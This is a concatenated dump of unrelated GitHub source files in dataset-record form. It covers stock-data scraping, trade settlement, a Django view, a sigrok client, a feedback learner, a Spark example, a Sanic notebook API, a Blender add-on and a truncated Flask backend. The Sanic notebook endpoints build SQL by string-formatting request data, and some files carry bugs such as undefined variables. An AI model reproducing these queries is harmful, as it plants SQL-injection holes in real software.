url=\"https://www1.nseindia.com/products/dynaContent/equities/indices/historicalindices.jsp?indexType=\" + varient + \"&fromDate=\" + from_date + \"&toDate=\" + to_date\n data = session.get(url=url, headers=head)\n soup = bs4.BeautifulSoup(data.text, 'html5lib')\n df = pd.read_csv(StringIO(soup.find('div', {'id': 'csvContentDiv'}).contents[0].replace(':','\\n')))\n return df\n\ndef makeDataset(url):\n with open(\"dataset.csv\", \"w\") as f:\n f.write(session.get(url).text)\n\n with open(\"dataset.csv\", \"r\") as f:\n dataset = csv.reader(f)\n niftyData = []\n stockData = []\n\n for idx, row in enumerate(dataset):\n if 8 <= idx <= 72:\n niftyData.append(row)\n if 126 <= idx:\n stockData.append(row)\n os.remove(\"dataset.csv\")\n return pd.DataFrame(niftyData), pd.DataFrame(stockData)\n\n\n\ndef getTodayData() -> object:\n data = session.get(url=\"https://www.nseindia.com/api/merged-daily-reports?key=favCapital\", headers=headers)\n return makeDataset(data.json()[1]['link'])\n\n\n# nifty_data, companies_data = getTodayData()\n# print(nifty_data.tail())\n# print(companies_data.tail())","repo_name":"ankitasuman009/data-engg-work","sub_path":"nse_scarping/getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30354291686","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\n\npath = os.path.abspath(os.path.join(os.path.dirname(__file__)))\nsys.path.append(path)\nfrom .sendmail import send_mail\nimport logging\nimport datetime as dt\nimport pandas as pd\nfrom WindPy import *\nimport mysql.connector\n\ncolumn = [\n 'account',\n 'settle_date',\n 'intraday_seq',\n 'contract',\n 'dir',\n 'quantity',\n 'open_strategy',\n 'open_order_time',\n 'open_deal_time',\n 'open_trigger_price',\n 'open_order_price',\n 'open_deal_price',\n 'mul',\n 'closed_price',\n 'profit']\n\n\n########################################################################################################################\nclass HoldingPositionProfit:\n def __init__(self):\n self.cnx = None\n return\n\n # ------------------------------------------------------------------------------------------------------------------\n def __del__(self):\n self.cnx.close()\n self.cnx_info.close()\n self.cnx_price.close()\n\n # ------------------------------------------------------------------------------------------------------------------\n def connect(self, settle_info):\n self.cnx = mysql.connector.connect(user=settle_info.dbase_acc,\n password=settle_info.dbase_pw,\n host=settle_info.dbase_ip,\n port=settle_info.port,\n database=settle_info.database_name)\n\n self.cnx_info = mysql.connector.connect(user=settle_info.contract_dbase_acc,\n password=settle_info.contract_dbase_pw,\n host=settle_info.contract_dbase_ip,\n port=settle_info.contract_port,\n database=settle_info.contract_database_name)\n\n self.cnx_price = mysql.connector.connect(user=settle_info.tick_dbase_acc,\n password=settle_info.tick_dbase_pw,\n host=settle_info.tick_dbase_ip,\n port=settle_info.tick_port,\n database=settle_info.tick_database_name)\n\n # ------------------------------------------------------------------------------------------------------------------\n def get_holding_position(self, settle_date, intraday_seq):\n cursor = self.cnx.cursor(cursor_class=mysql.connector.cursor.MySQLCursorDict)\n query = (\"SELECT * FROM holding_positions \"\n \"where \"\n \"settle_date = '%s' \"\n \"and \"\n \"intraday_seq = %s\" % (settle_date, intraday_seq))\n cursor.execute(query)\n data = list(cursor)\n\n return data\n\n # ------------------------------------------------------------------------------------------------------------------\n def get_volume_multiple(self, contract, TradingDay):\n cursor = self.cnx_info.cursor()\n query = (\"select VolumeMultiple from codetable \"\n \"where \"\n \"TradingDay = '{last_date}' \"\n \"and \"\n \"InstrumentID = '{contract}'\".format(last_date=TradingDay, contract=contract)\n )\n cursor.execute(query)\n volume_multiple = list(cursor)[0][0]\n\n return volume_multiple\n\n # ------------------------------------------------------------------------------------------------------------------\n def get_close_price(self, contract, settle_date, closed_time):\n cursor = self.cnx_price.cursor()\n query = (\"select max(datetime) from {contract} \"\n \"where \"\n \"datetime < '{settle_date} {closed_time}'\".format(contract=contract,\n settle_date=settle_date,\n closed_time=closed_time)\n )\n cursor.execute(query)\n last_datetime = list(cursor)[0][0]\n\n query = (\"select last_price from {contract} \"\n \"where \"\n \"datetime = '{last_datetime}'\".format(contract=contract, last_datetime=last_datetime)\n )\n cursor.execute(query)\n last_price = list(cursor)[0][0]\n\n return last_price\n\n\n# ----------------------------------------------------------------------------------------------------------------------\ndef holding_position_mysql_profit(settle_info):\n hpp = HoldingPositionProfit()\n hpp.connect(settle_info)\n\n settle_date = settle_info.settle_date\n is_daytime = settle_info.is_daytime\n closed_date = settle_info.closed_date\n holding_profit_folder = settle_info.holding_profit_folder\n TradingDay = settle_date.strftime(\"%Y%m%d\")\n\n if is_daytime is True:\n intraday_seq = '0900'\n closed_time = '15:00:00'\n elif is_daytime is False:\n intraday_seq = '2100'\n closed_time = '02:30:00'\n elif is_daytime is None:\n intraday_seq = '0'\n closed_time = '15:00:00'\n else:\n raise Exception('unrecognized intraday section parameter')\n\n holding_positions = hpp.get_holding_position(settle_date, intraday_seq)\n\n holding_profit_data = list()\n for i, piece in enumerate(holding_positions):\n contract = str(piece['contract'])\n open_price = int(piece['open_deal_price'])\n direction = int(piece['dir'])\n quantity = int(piece['quantity'])\n open_strategy = str(piece['open_strategy'])\n\n volume_multiple = hpp.get_volume_multiple(contract, TradingDay)\n close_price = hpp.get_close_price(contract, closed_date, closed_time)\n\n if not type(close_price) == float:\n close_price = 0\n\n net_profit = (close_price - open_price) * direction * quantity * volume_multiple\n\n holding_profit_data.append(\n [piece['account'],\n piece['settle_date'],\n piece['intraday_seq'],\n piece['contract'],\n piece['dir'],\n piece['quantity'],\n piece['open_strategy'],\n piece['open_order_time'],\n piece['open_deal_time'],\n piece['open_trigger_price'],\n piece['open_order_price'],\n piece['open_deal_price'],\n volume_multiple,\n close_price,\n net_profit])\n\n # print(open_strategy, contract, piece['open_deal_price'], close_price, net_profit)\n\n holding_profit_file = 'holding_profit_%s_%s.csv' % (settle_date, intraday_seq)\n holding_path = os.path.join(holding_profit_folder, holding_profit_file)\n\n holding_profit_data = pd.DataFrame(holding_profit_data, columns=column)\n holding_profit_data.to_csv(holding_path, index=False)\n\n if settle_info.send_holding_mail is True:\n send_mail(holding_profit_file, holding_path, settle_info.mail_account, settle_info.mail_password, settle_info.to_mail)\n\n if os.path.exists(holding_path):\n return True\n else:\n return False\n","repo_name":"hong142101/ats_log_parser","sub_path":"ats_log_parser/check_and_settle/holding_profit_qxy.py","file_name":"holding_profit_qxy.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8674460025","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\n\n\n# the home page of the main website\ndef home_view(request):\n user = request.user\n hello = 'Hello,'\n\n #Shows different main page depends on different users\n context = {\n 'user': user,\n 'hello': hello,\n }\n\n return render(request,'main/home.html', context)\n # return HttpResponse(\"Hello world\")","repo_name":"ericlin1230/Image-Repository","sub_path":"shopifyChallenge/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28018836444","text":"from typing import List, Optional\n\nimport numpy as np\n\nfrom . import Rpc, ComSrvError\n\n\nclass SigrokDevice(object):\n def __init__(self, addr, desc=None, rpc: Optional[Rpc] = None):\n if rpc is None:\n rpc = Rpc.make_default()\n self._addr = addr\n self._desc = desc\n\n @property\n def description(self):\n return self._desc\n\n @property\n def address(self):\n return self._addr\n\n async def read(\n self,\n channels: Optional[List[str]] = None,\n samplerate=48e6,\n num_samples=None,\n time=None,\n ):\n if time is not None and num_samples is not None:\n raise ValueError(\"Specifiy only one of time or num_samples\")\n if time is not None:\n acquire = {\"Time\": float(time)}\n elif num_samples is not None:\n acquire = {\"Samples\": int(num_samples)}\n else:\n raise ValueError(\"Neither time nor num_samples is given\")\n if channels is None:\n channels = []\n request = {\n \"Sigrok\": {\n \"instrument\": {\"address\": self._addr},\n \"request\": {\n \"channels\": channels,\n \"sample_rate\": int(samplerate),\n \"acquire\": acquire,\n },\n }\n }\n data = await self._rpc.get(self._url, request)\n ComSrvError.check_raise(data)\n data = data[\"Sigrok\"][\"Data\"]\n tsample = data[\"tsample\"]\n length = data[\"length\"]\n t = np.arange(0, length) * tsample\n ret = {}\n for (k, v) in data[\"channels\"].items():\n base = np.array(v, dtype=np.uint8)\n ret[k] = np.unpackbits(base, count=length, bitorder=\"little\")\n return t, ret\n\n\nasync def list_devices(rpc: Optional[Rpc] = None) -> List[SigrokDevice]:\n if rpc is None:\n rpc = Rpc.make_default()\n ret = await rpc.get({\"ListSigrokDevices\": None})\n ComSrvError.check_raise(ret)\n devices = ret[\"Sigrok\"][\"Devices\"]\n ret = []\n for dev in devices:\n ret.append(SigrokDevice(dev[\"addr\"], desc=dev[\"desc\"], rpc=rpc))\n return ret\n","repo_name":"raffber/comsrv","sub_path":"python/comsrv/sigrok.py","file_name":"sigrok.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9722944013","text":"import numpy as np\nfrom Law import Law\nfrom Teacher1 import Teacher1\nfrom Teacher2 import Teacher2\nfrom Teacher3 import Teacher3\nfrom Teacher4 import Teacher4\nfrom random import randint\nfrom tqdm import tqdm\n\n\nclass feedbackModel:\n\n def __init__(self, output_file_name=\"output.txt\", optimized=False):\n\n self.default_explanation = None\n self.default_label = None\n self.laws = [] # list of laws \n self.teacher = None\n self.num_of_mistakes = 0\n self.mistakes_made = []\n self.output_file_name = output_file_name\n self.f = None\n self.optimized = optimized\n\n def fit(self, X, y, teacher_type=1):\n # open output file\n self.f = open(self.output_file_name, \"a\")\n self.f.truncate(0) # erase the contents of the file if it already existed\n\n # shuffle the data\n indexes = np.arange(y.shape[0])\n np.random.shuffle(indexes)\n shuffled_X = X[indexes]\n shuffled_y = y[indexes]\n\n teacher_types = {1: Teacher1, 2: Teacher2, 3: Teacher3, 4: Teacher4}\n if teacher_type not in teacher_types:\n raise ValueError(\"Invalid teacher_type value\")\n\n # initialize teacher\n self.teacher = teacher_types[teacher_type](shuffled_X, shuffled_y)\n\n # get processed data from teacher\n preprocessed_data = self.teacher.get_preprocessed_data()\n\n # initialize default label and explanation\n i = randint(0, preprocessed_data.shape[0] - 1) # randomly select an index\n self.default_label = shuffled_y[i]\n self.default_explanation = preprocessed_data[i]\n\n # initialize prediction list for debugging purposes\n prediction_list = []\n\n self.f.write(\"-------------------- training --------------------\\n\\n\")\n for features in tqdm(preprocessed_data):\n\n # predict\n if self.optimized:\n prediction, explanation, law = self.__predict2(features)\n else:\n prediction, explanation, law = self.__predict(features)\n\n # get true label and discriminative feature from teacher\n true_label, discriminative_feature = self.teacher.teach(features, explanation, prediction)\n self.f.write(\"\\n-------------------- curr iteration information --------------------\\n\")\n self.f.write(f\"the example: {features}\\n\"\n f\"predicted: {prediction}, with the explanation of\\n{explanation}\\n\"\n f\"the teacher response is: {true_label} with {discriminative_feature} as discriminative feature\\n\")\n\n # in case the algorithm prediction was wrong\n if prediction != true_label:\n self.num_of_mistakes += 1\n if law is None:\n # create new law\n new_law = Law(features, true_label, discriminative_feature)\n self.laws.append(new_law)\n\n else:\n # update the law\n discriminative_feature[:, 1] = 1 - discriminative_feature[:, 1]\n law.updateFeatures(discriminative_feature)\n\n # for generating the graph\n self.mistakes_made.append(self.num_of_mistakes)\n prediction_list.append(prediction)\n\n examples_seen, percent_mistakes = self.plotAndPrint(prediction_list, y)\n\n # close the output file\n self.f.close()\n\n return examples_seen, percent_mistakes\n\n def plotAndPrint(self, prediction_list, y):\n self.f.write(\"\\n-------------------- printing the final decision list --------------------\\n\")\n for p, l in zip(prediction_list, y):\n answer = \"RIGHT\" if p == l else \"WRONG\"\n self.f.write(f\"prediction: {p},\\ttrue label: {l}\\t--> {answer}\\n\")\n\n num_of_example = y.shape[0]\n self.f.write(f\"\\npercentage of mistake on the entire data set: {self.num_of_mistakes} / {num_of_example} =\"\n f\" {(self.num_of_mistakes / num_of_example) * 100}%\")\n\n examples_seen = [i + 1 for i in range(num_of_example)]\n\n # calculate the percentage of mistakes made\n percent_mistakes = [(m / e) * 100 for m, e in zip(self.mistakes_made, examples_seen)]\n\n return examples_seen, percent_mistakes\n\n def __predict(self, features):\n for law in self.laws:\n if law.isFitting(features):\n prediction = law.getLabel()\n explanation = law.getExplanation()\n\n return prediction, explanation, law\n\n return self.default_label, self.default_explanation, None\n\n # instead of the default label, we predict based on the closest law\n def __predict2(self, features):\n closest_pred = self.default_label\n closest_expl = self.default_explanation\n max_num_of_matching_dfs = 0 # max number of discriminative features of a law that matched our features\n for law in self.laws:\n prediction = law.getLabel()\n explanation = law.getExplanation()\n\n if law.isFitting(features):\n return prediction, explanation, law\n\n num_of_matching_dfs = law.numOfMatchingFeatures(features)\n if num_of_matching_dfs > max_num_of_matching_dfs:\n max_num_of_matching_dfs = num_of_matching_dfs\n closest_pred = prediction\n closest_expl = explanation\n\n return closest_pred, closest_expl, None\n","repo_name":"nivyosef12/Data-Analysis-Learning-with-Explanations","sub_path":"feedbackModel.py","file_name":"feedbackModel.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9466183449","text":"# 5431. 민석이의 과제 체크하기\n# Level D3\n# Site: https://swexpertacademy.com/main/code/problem/problemList.do\n\nT = int(input())\nfor tc in range(1, T + 1):\n N, K = map(int, input().split())\n students = list(map(int, input().split()))\n visited = [0] * N\n for s in students:\n visited[s - 1] = 1\n\n print(f'#{tc}', end=' ')\n for i in range(len(visited)):\n if not visited[i]:\n print(i + 1, end=' ')\n print()\n","repo_name":"Panseung/algo_python_2023","sub_path":"SWEA_D3/230620/5431.py","file_name":"5431.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15600384133","text":"from pyspark.sql import SparkSession\n\ndata = \"/examples/data.jsonl\"\nspark = SparkSession.builder.appName(\"App\").getOrCreate()\n\ndf = spark.read.json(data)\ndf.select(\"name\").write.csv('/spark-result/dataframe-select', header=True)\n\nspark.read.json(data).createOrReplaceTempView(\"table\")\nspark.sql(\"SELECT name FROM table\").write.csv('/spark-result/sql-select', header=True)\n\nspark.stop()","repo_name":"michalliss/pwr-pdzd","sub_path":"docker/master_volume/examples/spark.py","file_name":"spark.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4882380567","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport logging\nfrom sanic import Blueprint, response\nfrom sanic.response import json, text, html, redirect\nimport ujson\nimport datetime\n\nlogger = logging.getLogger('notebook')\nnotebook_bp = Blueprint('notebook', url_prefix='notebook')\n\n@notebook_bp.route('/get',methods=['GET'])\nasync def notebooks(request):\n args = request.args\n limit = args.get('limit',10)\n start = args.get('start',0)\n order = args.get('order','desc')\n notebook_id = args.get('id',-1)\n\n notebooks = []\n\n author_id = request['session']['author_id'] if request['session']['author_id'] else -1\n\n if author_id <0 :\n return json({'error':'illegal information'}, status=400)\n\n sql = \"\"\"select * from notebook where author_id = '%s' \"\"\" % author_id\n if notebook_id >0:\n sql = sql + \"\"\"and article_id=%s \"\"\" % article_id\n sql = sql + \"\"\"order by id %s limit %s offset %s\"\"\" % (order,limit,start)\n\n async with request.app.db.acquire() as cur:\n try:\n records = await cur.fetch(sql)\n logger.info(sql)\n except Exception as e:\n logger.error(e)\n return json({'error':'illegal information'}, status=400)\n\n if records:\n for record in records:\n notebooks.append({\n \"id\": record['id'],\n \"name\": record['name'],\n })\n return json(notebooks)\n\n@notebook_bp.route('/post',methods=['POST'])\nasync def add_notebooks(request):\n data = {}\n try:\n data = ujson.loads(request.body)\n except:\n return json({'error':'illegal information'},status=400)\n\n author_id = request['session']['author_id'] if request['session']['author_id'] else -1\n if author_id <0:\n return json({'error':'illegal information'}, status=400)\n\n sql = \"\"\"insert into notebook (name,author_id) values ('%s','%s') RETURNING id,name\"\"\" \\\n %(data.get('name'), author_id)\n print(sql)\n async with request.app.db.acquire() as cur:\n try:\n res = await cur.fetch(sql)\n logger.info(sql)\n except Exception as e:\n logger.error(e)\n return json({'error':'service error'}, status=400)\n return json({'success':'success', 'id':res[0]['id'], 'name':res[0]['name']}, status=200)\n\n@notebook_bp.route('/put',methods=['PUT'])\nasync def update_notebook(request):\n data = {}\n try:\n data = ujson.loads(request.body)\n except:\n return json({'error':'illegal information'},status=400)\n\n author_id = request['session']['author_id'] if request['session']['author_id'] else -1\n if author_id <0:\n return json({'error':'illegal information'}, status=400)\n notebook_id = data.get(\"id\") if data.get(\"id\") else -1\n if article_id<0:\n return json({'error':'illegal information'},status=400)\n\n sql = \"\"\"update notebook set name='%s', author_id='%s' where id=%s\"\"\" \\\n %(data.get('name'),author_id,notebook_id)\n\n async with request.app.db.acquire() as cur:\n try:\n await cur.fetch(sql)\n logger.info(sql)\n except Exception as e:\n logger.error(e)\n return json({'error':'service error'}, status=400)\n return json({'success':'success'},status=200)\n\n@notebook_bp.route('/delete',methods=['DELETE'])\nasync def delete_notebook(request):\n data = {}\n try:\n data = ujson.loads(request.body)\n except:\n return json({'error':'illegal information'},status=400)\n\n author_id = request['session']['author_id'] if request['session']['author_id'] else -1\n if author_id <0:\n return json({'error':'illegal information'}, status=400)\n notebook_id = data.get(\"id\") if data.get(\"id\") else -1\n if article_id<0:\n return json({'error':'illegal information'},status=400)\n\n sql = \"\"\"delete from notebook where author_id='%s' and id=%s\"\"\"%(author_id,notebook_id)\n\n async with request.app.db.acquire() as cur:\n try:\n await cur.fetch(sql)\n logger.info(sql)\n except Exception as e:\n logger.error(e)\n return json({'error':'service error'}, status=400)\n return json({'success':'success'},status=200)\n","repo_name":"baojiweicn/susnote","sub_path":"app/views/notebook_view.py","file_name":"notebook_view.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"37"} +{"seq_id":"41898260068","text":"# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTIBILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\nimport bpy\n\nbl_info = {\n \"name\" : \"PivotPainter2\",\n \"author\" : \"Lukas Reznicek, Jonathan Lindquist\",\n \"description\" : \"\",\n \"blender\" : (2, 80, 0),\n \"version\" : (0, 0, 1),\n \"location\" : \"\",\n \"warning\" : \"\",\n \"category\" : \"Generic\"\n}\n\n\n\nfrom .operators.operators import OBJECT_OT_lr_pivot_painter_export\nfrom bpy.props import IntProperty, CollectionProperty, StringProperty,FloatVectorProperty,BoolProperty,EnumProperty\n\n\ndef img1_alpha_callback(scene, context):\n painter2 = bpy.context.scene.pivot_painter_2\n\n items = []\n if painter2.image_1_rgb == 'OP0':\n items = []\n elif painter2.image_1_rgb == 'OP1' or painter2.image_1_rgb == 'OP2' or painter2.image_1_rgb == 'OP3': #LDR\n items.append(('OP1', 'Parent Index (Int as Float)',''))\n # items.append(('OP2', 'Number of Steps From Root',''))\n items.append(('OP3', 'Random 0-1 Value Per Element',''))\n # items.append(('OP4', 'Bounding Box Diameter',''))\n # items.append(('OP5', 'Selection Order (Int as Float)',''))\n items.append(('OP6', 'Normalized 0-1 Hierarchy position',''))\n # items.append(('OP7', 'Object X Width',''))\n # items.append(('OP8', 'Object Y Depth',''))\n # items.append(('OP9', 'Object Z Height',''))\n items.append(('OP10', 'Parent Index (Float - Up to 2048)',''))\n\n elif painter2.image_1_rgb == 'OP4' or painter2.image_1_rgb == 'OP5' or painter2.image_1_rgb == 'OP6': #HDR\n items.append(('OP6', 'Normalized 0-1 Hierarchy position',''))\n items.append(('OP3', 'Random 0-1 Value Per Element',''))\n items.append(('OP11', 'X Extent Divided by 2048 - 2048 Max',''))\n items.append(('OP12', 'Y Extent Divided by 2048 - 2048 Max',''))\n items.append(('OP13', 'Z Extent Divided by 2048 - 2048 Max',''))\n return items\n\n\ndef img2_alpha_callback(scene, context):\n painter2 = bpy.context.scene.pivot_painter_2\n\n items = []\n if painter2.image_2_rgb == 'OP0':\n items = []\n elif painter2.image_2_rgb == 'OP1' or painter2.image_2_rgb == 'OP2' or painter2.image_2_rgb == 'OP3': #LDR\n items.append(('OP1', 'Parent Index (Int as Float)',''))\n # items.append(('OP2', 'Number of Steps From Root',''))\n items.append(('OP3', 'Random 0-1 Value Per Element',''))\n # items.append(('OP4', 'Bounding Box Diameter',''))\n # items.append(('OP5', 'Selection Order (Int as Float)',''))\n items.append(('OP6', 'Normalized 0-1 Hierarchy position',''))\n # items.append(('OP7', 'Object X Width',''))\n # items.append(('OP8', 'Object Y Depth',''))\n # items.append(('OP9', 'Object Z Height',''))\n items.append(('OP10', 'Parent Index (Float - Up to 2048)',''))\n\n elif painter2.image_2_rgb == 'OP4' or painter2.image_2_rgb == 'OP5' or painter2.image_2_rgb == 'OP6': #HDR\n items.append(('OP11', 'X Extent Divided by 2048 - 2048 Max',''))\n items.append(('OP12', 'Y Extent Divided by 2048 - 2048 Max',''))\n items.append(('OP13', 'Z Extent Divided by 2048 - 2048 Max',''))\n items.append(('OP6', 'Normalized 0-1 Hierarchy position',''))\n items.append(('OP3', 'Random 0-1 Value Per Element',''))\n\n return items\n\n# Properties \n# To acess properties: bpy.data.scenes['Scene'].pivot_painter_2\n# Is assigned by pointer property below in class registration.\nclass pivot_painter2_settings(bpy.types.PropertyGroup):\n\n\n image_1_rgb:bpy.props.EnumProperty(name= 'RGB', description= '',default = 1, items= [\n ('OP0', 'Do Not Render',''),\n ('OP1', 'Pivot Position (16-bit)',''),\n #('OP2', 'Origin Position(16-bit)',''),\n #('OP3', 'Origin Extents(16-bit)',''),\n ('OP4', 'X Vector(8-bit)',''),\n ('OP5', 'Y Vector(8-bit)',''),\n ('OP6', 'Z Vector(8-bit)','')])\n image_1_alpha:bpy.props.EnumProperty(name= 'Alpha', description= '', items= img1_alpha_callback)\n \n image_2_rgb:bpy.props.EnumProperty(name= 'RGB', description= '',default = 2, items= [\n ('OP0', 'Do Not Render',''),\n ('OP1', 'Pivot Position (16-bit)',''),\n #('OP2', 'Origin Position(16-bit)',''),\n #('OP3', 'Origin Extents(16-bit)',''),\n ('OP4', 'X Vector(8-bit)',''),\n ('OP5', 'Y Vector(8-bit)',''),\n ('OP6', 'Z Vector(8-bit)','')])\n\n\n image_2_alpha:bpy.props.EnumProperty(name= 'Alpha', description= '', items= img2_alpha_callback)\n\n export_name:bpy.props.StringProperty(name=\"Name\", description=\"Texture output base name. \\nUses active object name if empty\", default=\"\", maxlen=1024,)\n export_path:bpy.props.StringProperty(name=\"Folder\", description=\"Texture output location. \\n// = .blend file location\\n//..\\ = .blend file parent folder\", default=\"//\", maxlen=1024,subtype='DIR_PATH')\n uv_coordinate: bpy.props.IntProperty(name=\"Texture Coordinate\", description=\"Location of Pivot Painter custom UVs. Starts with 1\", default=2, min = 1, soft_max = 5)\n \n\n\n\nclass VIEW3D_PT_pivot_painter2(bpy.types.Panel):\n bl_label = \"Pivot Painter 2\"\n bl_idname = \"OBJECT_PT_pivot_painter2\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = 'PivotPainter2'\n\n\n def draw(self, context):\n\n pivot_painter_2 = context.scene.pivot_painter_2\n #myprops = bpy.context.scene['pivot_painter_2']\n\n layout = self.layout.box()\n layout.label(text=\"UVs\")\n\n row = layout.row(align=True)\n row.prop(pivot_painter_2, \"uv_coordinate\")\n\n\n\n #IMAGE 1 ----\n layout = self.layout.box()\n layout.label(text=\"Image 1\")\n\n row = layout.row(align=True)\n row.prop(pivot_painter_2, \"image_1_rgb\")\n row = layout.row(align=True)\n if pivot_painter_2.image_1_rgb != 'OP0': \n row.prop(pivot_painter_2, \"image_1_alpha\")\n\n\n #IMAGE 2 ----\n layout = self.layout.box()\n layout.label(text=\"Image 2\")\n\n row = layout.row(align=True)\n row.prop(pivot_painter_2, \"image_2_rgb\")\n row = layout.row(align=True)\n if pivot_painter_2.image_2_rgb != 'OP0': \n row.prop(pivot_painter_2, \"image_2_alpha\")\n\n\n\n\n\n layout = self.layout.box()\n row = layout.row(align=True)\n row.prop(pivot_painter_2, \"export_name\")\n row = layout.row(align=True)\n row.prop(pivot_painter_2, \"export_path\")\n row = layout.row(align=True)\n row.scale_y = 2\n row.operator(\"object.lr_pivot_painter_export\", text=\"Process Hierarchy\", icon = 'EXPORT')\n\n\nclasses = [pivot_painter2_settings,VIEW3D_PT_pivot_painter2, OBJECT_OT_lr_pivot_painter_export]\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n bpy.types.Scene.pivot_painter_2 = bpy.props.PointerProperty(type=pivot_painter2_settings)\n\ndef unregister():\n for cls in classes:\n bpy.utils.unregister_class(cls)\n del bpy.types.Scene.pivot_painter_2\n","repo_name":"lukasreznicek/PivotPainter2","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16671921579","text":"#!/usr/bin/env python\n\nimport pandas\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfor m in [5, 10, 15]:\n\t# MaF01 to MaF15, but MaF08, MaF06 (they cause a bug in FIR computing _probably a division by zero_)\n\tfor prob in (1, 2, 3, 4, 5, 7, 9, 10, 11, 12, 13, 14, 15): \n\t# for prob in range(1, 16): # MaF01 to MaF15\n\n\t\tp=\"MaF{0:0=2d}\".format(prob)\n\n\t\tdata=pandas.read_csv('experiment/MaFMethodology/'+str(m)+'/output/HHdEA2/'+p+'/moeasfir.0', header=None, delim_whitespace=True)\n\n\t\tfor i in range(1,20):\n\t\t\tdata+=pandas.read_csv('experiment/MaFMethodology/'+str(m)+'/output/HHdEA2/'+p+'/moeasfir.'+str(i), header=None, delim_whitespace=True)\n\n\t\tdata/=20\n\n\t\tplt.plot(data.cumsum())\n\t\tlabel=(\"SPEA2\",\"MOEAD\",\"NSGAII\",\"MOEADD\",\"MOMBI2\",\"NSGAIII\",\"ThetaDEA\",\"SPEA2SDE\",\"HypE\")\n\t\tplt.legend(label, ncol=3)\n\t\tplt.xlabel(\"iterations\")\n\t\tplt.ylabel(\"R2 accumulated average improvement\")\n\t\ttitle=p+\"m\"+str(m)\n\t\tplt.title(title)\n\t\t# plt.show()\n\t\tplt.savefig(\"img/moeasfir/moeasfir\"+title+\".eps\")\n\t\tplt.clf()\n\t\tprint(title)\n","repo_name":"fritsche/hhdea","sub_path":"scripts/hhdea2/moeasfir/permoea.py","file_name":"permoea.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"41000187268","text":"import json\nfrom bson import ObjectId\nfrom flask import Flask, request, Response\n\nfrom backend.tools import log\nlogger = log.setup_custom_logger('blight')\nlogger.info('Initialising server')\n\nfrom backend.landmarks import landmark_manager\nfrom backend.landmarks.landmark import Landmark\nfrom backend.landmarks import google_places\nfrom backend.user import user_info\nfrom backend.store import store_engine\n\nfrom backend.tools import admin\n\n\napp = Flask(__name__)\n\nclass JSONEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, ObjectId):\n return str(o)\n return json.JSONEncoder.default(self, o)\n\n\n@app.route(\"/api\")\ndef hello():\n return \"Hello GGJ2018!\"\n\n\n@app.route('/api/landmarks', methods=['GET'])\ndef get_landmarks():\n # if not authentication.authenticate_token(request):\n # return Response(\"Unauthorised access\", status=401)\n\n return Response(JSONEncoder().encode(landmark_manager.get_landmarks()), status=200, mimetype='application/json')\n\n\n@app.route('/api/landmarks/add_landmarks', methods=['POST'])\ndef refresh_landmarks():\n # if not authentication.authenticate_token(request):\n # return Response(\"Unauthorised access\", status=401)\n\n content = request.json\n if not content:\n return Response(\"Send me some coords yo\", status=400)\n\n lat = content[\"lat\"]\n lng = content[\"lng\"]\n\n\n location = str(lat) + ', ' + str(lng)\n logger.debug(\"location: \" +location)\n\n google_places.find_places(location)\n\n return Response(JSONEncoder().encode(landmark_manager.get_landmarks()), status=200, mimetype='application/json')\n\n@app.route('/api/landmarks/search', methods=['GET'])\ndef search_landmarks():\n # if not authentication.authenticate_token(request):\n # return Response(\"Unauthorised access\", status=401)\n name = request.args.get(\"name\")\n if not name:\n return Response(\"Send me a name yo!\", status=400)\n\n resp = landmark_manager.get_landmarks(name)\n if resp:\n return Response(JSONEncoder().encode(resp), status=200, mimetype='application/json')\n else:\n return Response(\"Couldn't find required info, sorry\", status=400)\n\n\n@app.route('/api/landmarks/add_virion', methods=['POST'])\ndef landmarks_add_virion():\n # if not authentication.authenticate_token(request):\n # return Response(\"Unauthorised access\", status=401)\n\n content = request.json\n if not content:\n return Response('Send me some stuff', status=400)\n\n name = content[\"name\"]\n quantity = content[\"quantity\"]\n landmark = content[\"landmark\"]\n\n ldm = Landmark(landmark)\n ldm.add_virion(quantity)\n\n\n return Response(JSONEncoder().encode(landmark_manager.get_landmarks()), status=200, mimetype='application/json')\n\n\n#GET requests return JSON object containing user info\n#POST requests creates a new entry for the new user in the db\n@app.route('/api/user', methods=[\"GET\",\"POST\"])\ndef user():\n\n if request.method == \"POST\":\n userid = request.headers[\"userid\"]\n content = request.json\n if userid and content:\n team=content[\"team\"]\n response = 